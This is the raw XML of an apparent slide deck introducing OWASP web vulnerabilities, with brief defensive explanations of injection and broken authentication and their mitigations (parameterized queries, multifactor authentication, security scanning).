                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7D141BEA-78C0-4646-9B0C-663F4C3A3C55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947862" y="123825"/>
            <a:ext cx="8124825" cy="5086350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41042296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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74D19A69-212D-42D9-8B91-88E998A77FE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="1181100"/>
            <a:ext cx="8324850" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38524072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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHAT IS OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AGE OF OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAN WE TRUST OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VULNERABILITIES AS PER OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14112084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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection occurs when an attacker exploits insecure code to insert (or inject) their own code into a program. Because the program is unable to determine code inserted in this way from its own code, attackers are able to use injection attacks to access secure areas and confidential information as though they are trusted users. Examples of injection include SQL injections, HTML command injections etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application security testing can reveal injection flaws and suggest remediation techniques such as stripping special characters from user input or writing parameterized SQL queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29527465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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B094A02-B00A-483B-AE2C-485034A7A8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="1666875"/>
            <a:ext cx="10267950" cy="2724150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20888247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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0870FA58-AAE9-4EAB-9B7B-94458EF01CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="816928"/>
            <a:ext cx="6419850" cy="5343525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13248254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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication &amp; Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incorrectly implemented authentication and session management calls can be a huge security risk. If attackers notice these vulnerabilities, they may be able to easily assume legitimate users' identities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multifactor authentication is one way to mitigate broken authentication. Implement DAST and SCA scans to detect and remove issues with implementation errors before code is deployed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34795815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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
